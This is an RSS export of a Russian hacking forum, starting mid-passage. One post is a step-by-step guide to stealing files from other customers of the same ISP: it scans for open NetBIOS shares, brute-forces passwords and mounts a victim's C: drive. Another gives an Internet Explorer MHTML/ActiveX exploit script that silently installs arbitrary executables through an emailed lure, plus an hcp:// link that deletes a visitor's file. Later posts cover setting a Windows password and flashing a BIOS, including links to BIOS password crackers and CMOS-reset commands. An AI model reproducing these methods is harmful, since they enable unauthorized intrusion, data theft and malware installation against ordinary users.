интернет - в результате вполне возможно, что когда вы подключитесь к интернет после перезагрузки жертвы уже там не будет. Экономьте время!!!&lt;br /&gt;Зачем жен нам Essential NetTools v3.0? Как было сказано выше - это сканер (более подробное описание вы сможете найти на страничке скачивания), нам же достаточно знать что он позволяет сканировать диапазон IP-адресов на расшаренные ресурсы, и выборочный адрес на шары (расшаренные, шары - ресурсы доступные пользователям рабочей группы, а следовательно и вам!), а также, что тоже немаловажно!, подбирать пароли доступа (не думайте что это такая уж быстрая процедура, но, как правило, в большинстве случаев лица с расшаренными ресурсами - это либо ломаки, либо лица чересчур самоуверенные, либо секретарши на фирмах (кстати почему бы им всем не подумать о безопасности?) у которых пароль подбирается буквально с первой - второй попытки:-))) Кроме того, она позволяет подключать эти самые шары к вашему компьютеру без головной боли (но эта процедура итак не очень утомительная). Ну вроде по этому поводу - все....&lt;br /&gt;HakTek v1.1 - в принципе особой необходимости в этой программе нет, но все-равно рекомендую скачать - мне больше всего нравится Finger Session. Вобщем - читайте описание на страничке скачивания.&lt;br /&gt;Зачем нам Advanced Dialer? Вроде бы простая звонилка... Но у нее есть одна хорошая черта. Вы хотите иметь пароли пользователей вашего провайдера? Тогда ставьте Advanced Dialer ибо он при подключении показывает и ваш IP-адрес и, что самое главное, IP-адрес сервера провайдера к которому вы подключены (так же как и многие другие пользователи!!!;-))) - вот это главное!&lt;br /&gt;Ну, предположим, что вы выполнили все рекомендации. Теперь начнем работу на примере кражи документов с диска С компьютера подключенного к тому же провайдеру что и вы:&lt;/p&gt;
						&lt;p&gt;Подключаемся к интернет при помощи Advanced Dialer и смотрим IP-адрес сервера провайдера (как правило он никогда не изменяется, так что смело можете записывать его на бумажку), допустим 194.153.128.132 - реальный IP-адрес провайдера ZEOS&lt;br /&gt;Запускаем Essential NetTools v3.0 и выбираем NBScan, там вводим начальный IP-адрес для сканирования &amp;quot;Starting IP adress&amp;quot; (в нашем случае пусть это будет например 194.153.128.0) и конечный IP-адрес &amp;quot;Ending IP adress&amp;quot; (в нашем случае это пусть будет 194.153.128.75, вообще-то конечным должен был бы быть IP 194.153.128.255, но я никогда не видел чтобы кто-то был подключен к адресу более 194.153.128.72, поэтому тратить кучу времени на сканирование еще 180 адресов по-моему просто глупо...&lt;br /&gt;После того как процесс сканирования окончен мы увидим примерно следующее:&lt;br /&gt;NAME WORKGROUP RS IP Adress MAC Adress&lt;br /&gt;Legioner Legion666 Yes 194.153.128.15 это нас не интересует&lt;br /&gt;Vovan Workgroup No 194.153.128.19 это нас не интересует&lt;br /&gt;Dmitriy Venera Yes 194.153.128.21 это нас не интересует&lt;br /&gt;Sinelnikov Claus Yes 194.153.128.32 это нас не интересует&lt;br /&gt;Kinder Troja Yes 194.153.128.43 это нас не интересует&lt;br /&gt;Sky Circus Yes 194.153.128.47 это нас не интересует&lt;br /&gt;Trishka Killers No 194.153.128.64 это нас не интересует&lt;br /&gt;Judge Dred No 194.153.128.69 это нас не интересует&lt;/p&gt;
						&lt;p&gt;4. Мы видим имена, рабочие группы, RS - расшаренные ресурсы, IP-адреса, адреса МАК компьютеров с NetBios Sessions (то есть с открытым 139 - м портом) Кстати не забудьте включить у себя NetBios - иначе ничего не будет, также для личной безопасности сделайте все диски и принтеры локальными (защитите их от чтения и записи). Нам нужны только: рабочая группа, RS, IP-адреса. Если RS - No - об этом компьютере можно сразу забыть. Если же -Yes, то можно попробовать подключится к нему.&lt;/p&gt;
						&lt;p&gt;Для этого:&lt;/p&gt;
						&lt;p&gt;Включаем NAT&lt;br /&gt;Вводим адрес IP - например 194.153.128.15 и нажимаем &amp;quot;SCAN&amp;quot;&lt;br /&gt;Теперь немного подождем...&lt;br /&gt;Что мы видим:&lt;/p&gt;
						&lt;p&gt;* Checking 194.153.128.47 ...&lt;br /&gt;* Obtained NetBIOS name table:&lt;br /&gt;SKY&lt;br /&gt;SKY&lt;br /&gt;CIRCUS&lt;br /&gt;SKY&lt;br /&gt;CIRCUS&lt;br /&gt;DAN&lt;br /&gt;CIRCUS&lt;br /&gt;..__MSBROWSE__.&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;&amp;quot;: failed - начало подбора пароля&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;ADMINISTRATOR&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;GUEST&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;ROOT&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;ADMIN&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;PASSWORD&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;TEMP&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;SHARE&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;WRITE&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;FULL&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;BOTH&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;READ&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;FILES&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;DEMO&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;TEST&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;ACCESS&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;USER&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;BACKUP&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;SYSTEM&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;SERVER&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;ADMINISTRATOR&amp;quot;, password &amp;quot;LOCAL&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;GUEST&amp;quot;, password &amp;quot;&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;GUEST&amp;quot;, password &amp;quot;ADMINISTRATOR&amp;quot;: failed&lt;br /&gt;* Trying username &amp;quot;GUEST&amp;quot;, password &amp;quot;GUEST&amp;quot;: succeeded - пароль успешно подобран&lt;br /&gt;* Obtained share list: - список возможных доступных ресурсов&lt;br /&gt;IPC$ Remote IPC&lt;br /&gt;E$ Default share&lt;br /&gt;D$ Default share&lt;br /&gt;C&lt;br /&gt;ADMIN$ Remote Admin&lt;br /&gt;C$ Default share&lt;br /&gt;* Obtained server information:&lt;br /&gt;Server=[SKY] User=[] Workgroup=[SKYGROUP] Domain=[]&lt;br /&gt;* Checking share E$: access denied - доступ запрещен&lt;br /&gt;* Checking share D$: access denied - доступ запрещен&lt;br /&gt;* Checking share C: read-write access - доступ разрешен для чтения-записи&lt;br /&gt;* Checking share ADMIN$: access denied&lt;br /&gt;* Checking share C$: access denied&lt;br /&gt;* Finished checking 194.153.128.47&lt;/p&gt;
						&lt;p&gt;Ну вот мы и нашли подходящую жертву! Как видно из списка, мы можем подключиться к диску С (разрешен доступ для чтения и записи), то есть мы можем записывать жертве на диск, стирать с его диска, копировать с его диска!&lt;br /&gt;Теперь нам нужно подключить удаленный компьютер. В этом нет ничего сложного. Для этого нам нужно изменить рабочую группу согласно вышеописанному способу. В Essential NetTools открыть NBScan и выделить потенциальную &amp;quot;жертву&amp;quot;, в нашем случае это Sky с рабочей группой Circus и IP-адресом 194.153.128.47, нажать правую кнопку мышки и выбрать в контекстном меню &amp;quot;Open computer&amp;quot;. В ответ откроется стандартное окно Windows где будет присутствовать диск &amp;quot;С&amp;quot;. Наводим на этот самый диск &amp;quot;С&amp;quot; нажимаем правую кнопку мыши и в контекстном меню выбираем &amp;quot;Подключить сетевой диск&amp;quot;, когда главный каталог будет считан мы можем начинать &amp;quot;лазить&amp;quot;, а точнее сказать &amp;quot;ползать&amp;quot; по диску &amp;quot;С&amp;quot; удаленного компьютера с адресом 194.153.128.47, делать это можно при помощи стандартного &amp;quot;Проводника&amp;quot;, Windows Commander и других программ.&lt;br /&gt;&lt;a href=&quot;http://stfw.ru/page.php?id=87&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://stfw.ru/page.php?id=87&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Взламываем компьютер через Internet Explorer&lt;br /&gt;Взламываем компьютер через Internet Explorer&lt;/p&gt;
						&lt;p&gt;Автор: Digital Scream&lt;/p&gt;
						&lt;p&gt;О чем идет речь?&lt;/p&gt;
						&lt;p&gt;Темой данной заметки является описание способа загрузки и исполнения произвольных приложений на клиентском компьютере. Естественно, что пользователь обязан сделать - посетить некий узел. Чтобы добиться результатов следует прибегнуть к приемам НЛП. Согласитесь, вероятнее всего человек быстрее нажмет на ссылку ведущую к web страничке, нежели на файл. Наша с вами задача придумать способ загрузить и исполнить приложение на его компьютере. Что, оказывается, весьма несложно сделать... Многие не имеют опыта такого проникновения на целевой компьютер. Хотя он является, пожалуй, одним из лучших. Это связано с тем, что пользователю не нужно будет подтверждать никакой загрузки файла, а потом еще и вручную его запускать. За него все сделает Internet Explorer.&lt;/p&gt;
						&lt;p&gt;Как это работает?&lt;/p&gt;
						&lt;p&gt;Пример действует по достаточно интересной схеме:&lt;br /&gt;загружается как HTML файл&lt;br /&gt;загружает себя как MHTML&lt;br /&gt;Сам HTML файл состоит из двух блоков: первый указывает на наличие некого файла согласно стандартам MHTML и MIME, а второй блок - это HTML. Первый блок для второго является простым текстом, хотя в действительности это файл, зашифрованный в base64. Поэтому при открытии файла срабатывает блок HTML:&lt;br /&gt;BОDY&lt;br /&gt;SСRIPT&lt;br /&gt;function Execute()&lt;br /&gt;{&lt;br /&gt;path=unescapе(dоcument.URL.substr(-0,document.URL.lastIndexОf(&amp;quot;\\&amp;quot;)));&lt;br /&gt;document.write( &#039;&amp;lt;оbject style=&amp;quot;visibility:hidden&amp;quot; classid=&amp;quot;clsid:66666666-6666-6666-6666&amp;quot; CODEBASE=&amp;quot;mhtml:&#039;+path+&#039;\\main.html!file:///InternetExplorer.exe&amp;quot;&amp;gt;&#039;) } Execute(); /SСRIPT&lt;br /&gt;Немного поясню, что именно происходит. При обработке данного документа исполняется скрипт, устанавливающий новый компонент с CLSID(ClassID) 66666666-6666-6666-6666. Исполняемый код для компоненты берется из этого же файла и именно поэтому происходит определение его местоположения (переменная path). Вся разница в том, что открывается он уже как MHTML. Поэтому мы можем обращаться к любому ресурсу, хранящемуся в нем (в данном случае это приложение). Его указание происходит согласно следующей форме записи:&lt;/p&gt;
						&lt;p&gt;mhtml:имя_html_файла!имя_ресурса&lt;/p&gt;
						&lt;p&gt;Что касается первого блока, то его заголовок должен выглядеть примерно следующим образом:&lt;/p&gt;
						&lt;p&gt;MIME-Version: 1.0&lt;br /&gt;Content-Location:file:///InternetExplorer.exe&lt;br /&gt;Content-Transfer-Encoding: base64&lt;/p&gt;
						&lt;p&gt;В качестве значения Content-Location желательно указать что-нибуть приличное. Эта переменная потом появится в строке состояния Internet Explorer как окончание к тексту &amp;quot;Установка компонента...&amp;quot;. Тем более, что именно ее необходимо указывать как имя желаемого ресурса. Далее должен идти бинарный код приложения в формате base64.&lt;/p&gt;
						&lt;p&gt;Как можно автоматизировать процесс?&lt;/p&gt;
						&lt;p&gt;Для построения полнофункциональной универсальной утилиты необходимо создать следующую систему:&lt;br /&gt;1 HTML файл, посылающий запрос на сервер с формой хранящей такие данные как:&lt;br /&gt;- атакуемая почта&lt;br /&gt;- содержание письма&lt;br /&gt;- исполняемый файл (используйте INРUT &amp;quot;tуpe=filе&amp;quot;)&lt;br /&gt;- содержание HTML файла хранящего исполняемый&lt;br /&gt;2 PERL скрипт, создающий на сервере специально сформированный HTML файл, хранящий исполняемое ПО в base64 и то, что пользователь увидит в броузере. В base64 обычный EXE файл можно конвертировать использовав модуль MIME::Base64:&lt;br /&gt;$encoded=encode_base64($decoded);&lt;br /&gt;$decoded=decode_base64($encoded);&lt;br /&gt;После чего отсылается письмо пользователю на компьютере которого необходимо запустить приложение. Согласитесь, весьма проста и в тоже время интересная технология.&lt;/p&gt;
						&lt;p&gt;Что это нам дает?&lt;/p&gt;
						&lt;p&gt;Такая уязвимость позволяет незаметно установить удаленному пользователю практически любое приложение. Среди таких приложений могут также быть вирусы и троянские кони. И как всегда решением является банальное запрещение загрузки ActiveX.&lt;/p&gt;
						&lt;p&gt;Есть готовый пример?&lt;/p&gt;
						&lt;p&gt;А для желающих проверить все вышесказанное предлагается готовый файл main.html. Вдобавок хочу написать, что человеческая фантазия не имееет границ. Так, совсем недавно мне попалось сообщение о том, что направив пользователя по ссылке hcp://system/DFS/uplddrvinfo.htm?file://c:\main.txt можно удалить у него файл c:\main.txt, если такой действительно существует. Это значит, что всегда необходимо искать что-то новое, поверьте оно найдется :)&lt;br /&gt;&lt;a href=&quot;http://bcteam.by.ru/pages/articles/vzkia.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://bcteam.by.ru/pages/articles/vzkia.html&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Mon, 07 Feb 2011 12:37:58 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=20#p20</guid>
		</item>
		<item>
			<title>пароли на пользователя</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=19#p19</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;/span&gt;СТАВИМ ПАРОЛЬ НА АНКЕТУ ПОЛЬЗОВАТЕЛЯ&lt;span style=&quot;color: red&quot;&gt;&lt;/span&gt;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;Рано или поздно в жизни любого пользователя компьютера возникает вопрос: &amp;quot;Как поставить пароль на компьютер&amp;quot;. Каждый знает что пароль на компьютер поставить возможно, но как это реализовать на практике догадываются лишь единицы.&lt;/p&gt;
						&lt;p&gt;Под вопросом &amp;quot;Как установить пароль на компьютер&amp;quot; можно понимать многое, но мы в этой статье разберём самый простой и самый нужный вариант - установку пароля на загрузку операционной системы.&lt;/p&gt;
						&lt;p&gt;Для установки Вам необходимо выполнить ряд несложных операций, а именно зайти Пуск-&amp;gt;Панель управления-&amp;gt;Учётные записи пользователей.&lt;/p&gt;
						&lt;p&gt;В случае если Вы пользователь Windows XP, то необходимо кликнуть по значку учётной записи нужного пользователя и выбрать пункт &amp;quot;Создать пароль&amp;quot;.&lt;/p&gt;
						&lt;p&gt;А если у вас новая Windows 7 то для Вас подойдёт пункт &amp;quot;создание пароля своей учётной записи&amp;quot;.&lt;/p&gt;
						&lt;p&gt;В открывшемся диалоговом окне остаётся лишь ввести свой первый пароль и постараться его не забыть.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Mon, 07 Feb 2011 12:32:30 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=19#p19</guid>
		</item>
		<item>
			<title>КАК ПЕРЕПРОШИТЬ БИОС СПРОСИТЕ ВЫ?</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=18#p18</link>
			<description>&lt;p&gt;Обычно в замене микропрограммы BIOS’а материнской платы нет никакой необходимости – устройство замечательно работает, а рисковать работоспособностью девайса ради более высокого номера версии прошивки как минимум глупо. Однако случается, что материнская плата поступает на рынок с «сырым» микрокодом (производители спешат обойти конкурентов на повороте), или возникают проблемы с интегрированными устройствами, или выясняется, что мать отказывается работать с некоторыми моделями памяти, или выходит новое, более современное оборудование (например, пополнен список поддерживаемых CPU) и т.д. Тогда новые партии матерей поступают в продажу с обновленным firware, а владельцам более ранних девайсов остается перепрошивать BIOS. Новые версии прошивок появляются на сайтах производителей со списком внесенных исправлений и изменений по сравнению с предыдущей версией. Если с материнской платой возникли какие-то проблемы или имеются недостатки в ее работе, стоит заглянуть на сайт производителя и изучить перечни этих изменений – возможно, ответ найдется там. Существуют также модернизированные умельцами версии прошивок, которые позволяют включить ту или иную функцию, заблокированную производителем в микрокоде для бюджетной модели одного и того же чипсета. Если необходимость замены версии микропрограммы стала очевидной, готовься к перепрошивке, а мы постараемся рассказать, что тебя ждет и как надо действовать.&lt;br /&gt;Как шить?&lt;/p&gt;
						&lt;p&gt;Для перепрошивки BIOS используются специализированные утилиты от производителя материнской платы или сторонних программистов, которые и записывают образ микропрограммы в микросхему CMOS. CMOS у современных матерей представляет собой flash-память, в которой хранятся сам микрокод и настройки BIOS. Таким образом, для прошивки необходимы, собственно, файл с нужной версией BIOS и программа-флешер. Существуют флешеры как под Windows, так и под DOS. Прошивать из Windows гораздо удобнее, зато DOS традиционно более надежен. Чтобы выявить все аспекты процесса перепрошивки BIOS, мы прошивали как из-под Windows XP, так и из-под DOS.&lt;/p&gt;
						&lt;p&gt;Для начала при помощи программы-флешера необходимо сделать бэкап установленной версии BIOS на дискету. В случае неудачной перепрошивки эта дискета тебе очень пригодится. Сначала замена макропрограммы проводилась при помощи утилит, поставляемых самим производителем. Такую утилиту ты всегда сможешь найти на диске, который идет в комплекте с материнской платой, или на сайте ее производителя. Сторонними программами без необходимости пользоваться не советуем, так как велик шанс потом отправиться в гарантийную мастерскую. Самую свежую версию firmware сразу ставить также не рекомендуем. Лучше поискать информацию, касающуюся твоей материнской платы, в соответствующих формах и просмотреть отзывы юзеров, поставивших себе ту или иную версию микропрограммы. Поступать так следует потому, что прошивки бывают не отлажены до конца, и в работе матери могут появиться серьезные сбои.&lt;br /&gt;Особенности процесса&lt;/p&gt;
						&lt;p&gt;Первым делом советуем озаботиться стабильным питанием. Идеальным вариантом является наличие источника бесперебойного питания. Если такого чуда нет, то лучше всего выбрать для перепрошивки время, когда наименее возможны скачки напряжения, то есть ночью (ведь твои соседи не сверлят стены электродрелью по ночам?).&lt;/p&gt;
						&lt;p&gt;Вторым пунктом стоит выбор операционки, из-под которой будет идти процесс перепрошивки. Если хочется красоты и покоя, то можно смело делать это из-под Windows. Система Widows XP уже достаточно стабильна, поэтому под ней обновление firmware можно осуществлять, особо ничего не опасаясь. На всякий случай рекомендуется закрыть все приложения и отключить антивирус. Под другими версиями Windows (за исключением линейки Widows NT), зная их глючность, лучше не перепрошивать. Безопаснее будет сделать это из-под DOS&#039;а.&lt;/p&gt;
						&lt;p&gt;Что касается DOS, этим методом могут пользоваться те, кому не лень потратить чуть больше времени на настройку. За это получаем чуть большую надежность. Сама подготовка заключается в создании загрузочной дискеты. Дополнительно надо будет записать на нее программу-прошивальщик (например, для микросхем фирмы Award применяется программа awdflash, для AMI BIOS - amiflash) и саму микропрограмму. Можно создать bat-файл с параметрами запуска прошивальщика, и останется только вставить дискету и загрузиться с нее. Тем, кто когда-либо работал в DOS&#039;е, не составит труда во всем разобраться.&lt;/p&gt;
						&lt;p&gt;Третий способ обновления firmware встречается нечасто. Обновление микропрограммы осуществляется средствами самого BIOS’а. Достаточно зайти в меню обновления и указать желаемую прошивку, записанную прежде на дискету.&lt;/p&gt;
						&lt;p&gt;Однако независимо от избранного способа перепрошивки обязательно предварительно делать бэкап старой версии!&lt;br /&gt;Тестирование&lt;/p&gt;
						&lt;p&gt;Мы взяли две материнские платы: ASUS DualBIOS с микросхемами от Award и Gigabyte с двумя BIOS’ами от фирмы Phoenix. Прошивать было решено двумя путями: в WindowsXP и в DOS&#039;е. Начнем с Gigabyte.&lt;/p&gt;
						&lt;p&gt;Для прошивки использовалась утилита, поставляемая на диске с материнской платой - @BIOS (в Интернете можно найти как atBIOS). Для начала мы сохранили текущую прошивку в файл. Вторым шагом мы поставили галочку напротив Internet update. Было интересно протестировать обновление BIOS&#039;а через Интернет. Осуществить это не удалось, так как программа просто не знала, откуда скачать обновление, а ввести адрес вручную утилита не позволяет. С официального сайта Gigabyte была скачана 17-я версия прошивки. Заново была запущена @BIOS и произведена процедура обновления. Для этого достаточно было указать путь к файлу на жестком диске. Пару минут индикатор прогресса демонстрировал процесс заливки микропрограммы, после чего было выдано сообщение об успешно произведенном обновлении. Компьютер был выключен, отсоединен блок питания (на его конденсаторах еще довольно длительное время сохраняется заряд) и вытащена батарейка CMOS. В принципе, достаточно замкнуть специальный джампер на материнской плате, но для верности лучше вынуть батарейку на несколько минут. Делать это необходимо после каждой перепрошивки для того, чтобы сбросить все настройки BIOS в исходное состояние. Дело в том, что ранее сделанные настройки хранятся в той же микросхеме и после перепрошивки сохраняются и могут конфликтовать с новой версией микропрограммы.&lt;/p&gt;
						&lt;p&gt;Спустя какое-то время батарейку вернули на место, подключили блок питания и загрузили систему. Все работало стабильно. Запустив @BIOS для просмотра параметров BIOS’а, мы были несколько удивлены полученными данными: по заверениям программы у нас стояла 15-я версия прошивки, хотя устанавливали мы 17-ю (до проведения теста стояла 6-я).&lt;/p&gt;
						&lt;p&gt;После этого было решено повторить процесс перепрошивки, но уже из BIOS’а, так как на этой материнской плате такая возможность имелась. Для этого использовался тот же микрокод. На дискету была записана 17-я версия firmware. В меню замены микропрограммы можно было попасть, если, войдя в BIOS (по клавише &amp;lt;Del&amp;gt; ), нажать &amp;lt;F8&amp;gt; . Первым делом сохраняем основной BIOS во вторую (резервную) микросхему командой «save main bios from reserved» (в случае сбоя он будет восстановлен оттуда) и не забываем делать бэкап на дискету. Следующим шагом заменяем установленную прошивку на более новую версию. Делается это командой «update main bios from floppy». Выбираем нужную версию с дискеты и ждем несколько минут. После окончания процедуры выключаем компьютер и снова на несколько минут отсоединяем блок питания и вытаскиваем батарейку CMOS. Загружаемся, включаем @BIOS и в свойствах видим версию прошивки 17. Вывод: несмотря на старания программистов и выпуск хорошей утилиты для апдейта BIOS&#039;а из Windows, недоработки еще есть, и прошивка средствами BIOS является более надежным способом.&lt;/p&gt;
						&lt;p&gt;Следующей подверглась тестированию материнская плата ASUS с микросхемой фирмы AWARD. Первым делом была установлена и детально изучена утилита, поставляемая на диске с материнской платой - ASUS Flash. Снова мы первым делом сохранили текущую прошивку и приступили к тестированию. Среди прочих функций нашлось обновление через Интернет. Программа перебрала несколько серверов в своей базе и подключилась по одному из адресов. Апдейт благополучно скачался и был сохранен где-то в недрах системы. Автоматическая перепрошивка не удалась – утилита не нашла загруженную микропрограмму. Тогда мы взялись за поиски микрокода на просторах Интернета. Сайт производителя материнской платы оказался очень приветливым и подробно описывал, какие недостатки устранены в очередной версии кода. Мы взяли последнюю версию прошивки и произвели обновление. Загрузка прошла стандартно. После этого компьютер был отключен, и вынута батарейка. Спустя некоторое время машину включили, и она сразу отказалась работать, сославшись на отсутствие или ошибку клавиатуры. В этом случае и понадобилась подготовленная заранее дискета с флешером и старой прошивкой. Предварительно мы решили зайти в BIOS и посмотреть на произошедшие изменения. Они были налицо: В Power managment setup все индикаторы показывали отсутствие питания. А показатели температуры равнялись 49 и 6 градусам Цельсия для материнской платы и процессора соответственно (при 25 градусах в помещении). Вот таким образом выглядят глюки недоработанного кода.&lt;/p&gt;
						&lt;p&gt;Загрузившись с «аварийной» дискеты и проигнорировав сообщения об ошибках, мы запустили awdflash. Очень не понравилась одна особенность программы: необходимо знать название файла с прошивкой и указать его в строке запроса. Утилита отказалась работать, сославшись на отсутствие новой прошивки. Тогда в сети была найдена программа ASUS ACPI BIOS FLASH MEMORY WRITER и записана на ту же дискету. В ней также необходимо указывать название файла с прошивкой. Процесс прошел без эксцессов, и машина была отключена с последующим сбросом CMOS. Компьютер загрузился без ошибок, только было выдано сообщение о повреждении BIOS’а и выведен запрос о восстановлении из запасной микросхемы. На восстановление был дан положительный ответ, а тест был признан проваленным. Это особенно странно, потому что были использована фирменная утилита, а файл с прошивкой был взят с официального сайта. Возможно, это глюк прошивки. Таким образом, надежнее прошивать из-под DOS и всегда надо иметь бэкап прошивки с программой-флешером на дискете.&lt;br /&gt;Проблемы и методы их устранения&lt;/p&gt;
						&lt;p&gt;Перепрошивая BIOS, надо помнить, что ошибка в процессе смены микропрограммы может привести к печальным последствиям. Иногда во время перепрошивки происходит отключение питания или зависание системы. В этом случае гарантированно поможет лишь программатор, который в домашних условиях встречается не часто, и есть только в гарантийной мастерской. Именно туда лучше обращаться в случае проблем.&lt;/p&gt;
						&lt;p&gt;Если BIOS не прошит до конца, и микросхема в системе одна, может помочь такой достаточно рискованный метод: Находится такая же материнская плата, во включенном состоянии, после того как прошла загрузка машины, с нее снимается исправный CMOS и в гнездо укладывается пара ниток, чтобы можно было легко вынуть микросхему, потянув за них. Затем на освободившееся место очень аккуратно ставят поврежденный аналог. После этого можно запускать прошивку firmware, а затем уже в выключенном состоянии менять микросхемы обратно. По статистике, при «горячей» замене CMOS, рабочая материнская плата повреждается в 15% случаев.&lt;/p&gt;
						&lt;p&gt;Другой метод предполагает наличие на материнской плате двух микросхем (в этом случае в названии платы, обычно, фигурирует приставка Dual BIOS). Тогда при неудачной прошивке BIOS восстанавливается самостоятельно (после извещения об ошибке и запроса на восстановление). Происходит это простым копированием заведомо рабочей микропрограммы из второй микросхемы.&lt;br /&gt;Возможные вопросы&lt;/p&gt;
						&lt;p&gt;Иногда возникает проблема определения производителя материнской платы и установленного на ней чипсета. Чтобы решить эту задачу, достаточно в самом начале загрузки компьютера записать строку, которую выдает BIOS. Кроме того, с 1998 года все устанавливаемые BIOS’ы при загрузке выводят логотип производителя. Далее, любой поисковик выдаст всю информацию о твоей материнке по этой строчке. Правда, если плата секондхенд и взята на радиорынке, никто не даст гарантии, что логотип и информационная строка не были изменены.&lt;/p&gt;
						&lt;p&gt;Что делать, если на BIOS стоит пароль? В этом случае есть целых три варианта: 1) сбросить CMOS специальным джампером на материнской плате или просто вынуть батарейку; 2) воспользоваться инженерными паролями, список которых можно посмотреть во врезке (правда, они могут не сработать); 3) взломать пароль к BIOS’у. Для этого существуют специальные программы, для каждого производителя BIOS’а – своя. Для AWARD можно скачать программу по адресу:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; * &lt;a href=&quot;http://ixbt.stack.net/mainboard/download/awardcrack.zip&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://ixbt.stack.net/mainboard/download/awardcrack.zip&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Для AMI&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; * &lt;a href=&quot;http://ixbt.stack.net/mainboard/download/amicrack.zip&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://ixbt.stack.net/mainboard/download/amicrack.zip&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Бывает, что к джамперу или батарейке добраться не представляется возможным. В этом случае можно сбросить настройки из DOS (только не в режиме эмуляция DOS в Windows!). Для этого нужно набрать в командной строке следующие команды:&lt;br /&gt;Для Award и AMI BIOS&lt;/p&gt;
						&lt;p&gt;DEBUG&lt;/p&gt;
						&lt;p&gt;-O 70 17&lt;/p&gt;
						&lt;p&gt;-O 71 17&lt;/p&gt;
						&lt;p&gt;Q&lt;br /&gt;Для Phoenix BIOS&lt;/p&gt;
						&lt;p&gt;DEBUG&lt;/p&gt;
						&lt;p&gt;-O 70 FF&lt;/p&gt;
						&lt;p&gt;-O 71 17&lt;/p&gt;
						&lt;p&gt;Q&lt;/p&gt;
						&lt;p&gt;Таким образом, ты напрямую записываешь в 70-й порт значение 17, которое не равно контрольной сумме BIOS при нормальной работе, поэтому CMOS сбрасывается. Однако будь осторожен – в случае ошибки ты можешь нарушить работу компьютера или повредить BIOS!&lt;br /&gt;Автоматизация&lt;/p&gt;
						&lt;p&gt;Для автоматизации перепрошивки можно создать bat-файл, назвать autoexec.bat и записать его на дискету с флешером и новой прошивкой. Выглядеть этот файл будет так:&lt;/p&gt;
						&lt;p&gt;AWDFLASH [FileName1] [FileName2], где FileName1- это имя новой прошивки, а FileName2 - имя сохраняемой текущей прошивки. Также программа обладает некоторыми ключами, например /E - выход в DOS после выполнения процедуры обновления микрокода, /R - перезагрузить систему после окончания прошивки. Остальные ключи можно просмотреть, запустив awdflash.exe с параметром /?. Таким образом, наш загрузочный файл принял вид: «AWDFLASH [FileName1] [FileName2] /R». Подготовив такую дискетку, можно перепрошить BIOS даже не включая монитор (бывают случаи, когда графика не работает). Окончание загрузки можно будет определить по окончанию работы дисковода и писку динамика (при перезагрузке).&lt;br /&gt;Бонус&lt;/p&gt;
						&lt;p&gt;Как дополнительную фишку можно рассмотреть смену логотипа, выводимого BIOS&#039;ом на экран. Для всей операции нам потребуются две программы: cbrom и converta. cbrom нужна для работы с файлом прошивки, а converta - для конвертации изображений в необходимый формат.&lt;/p&gt;
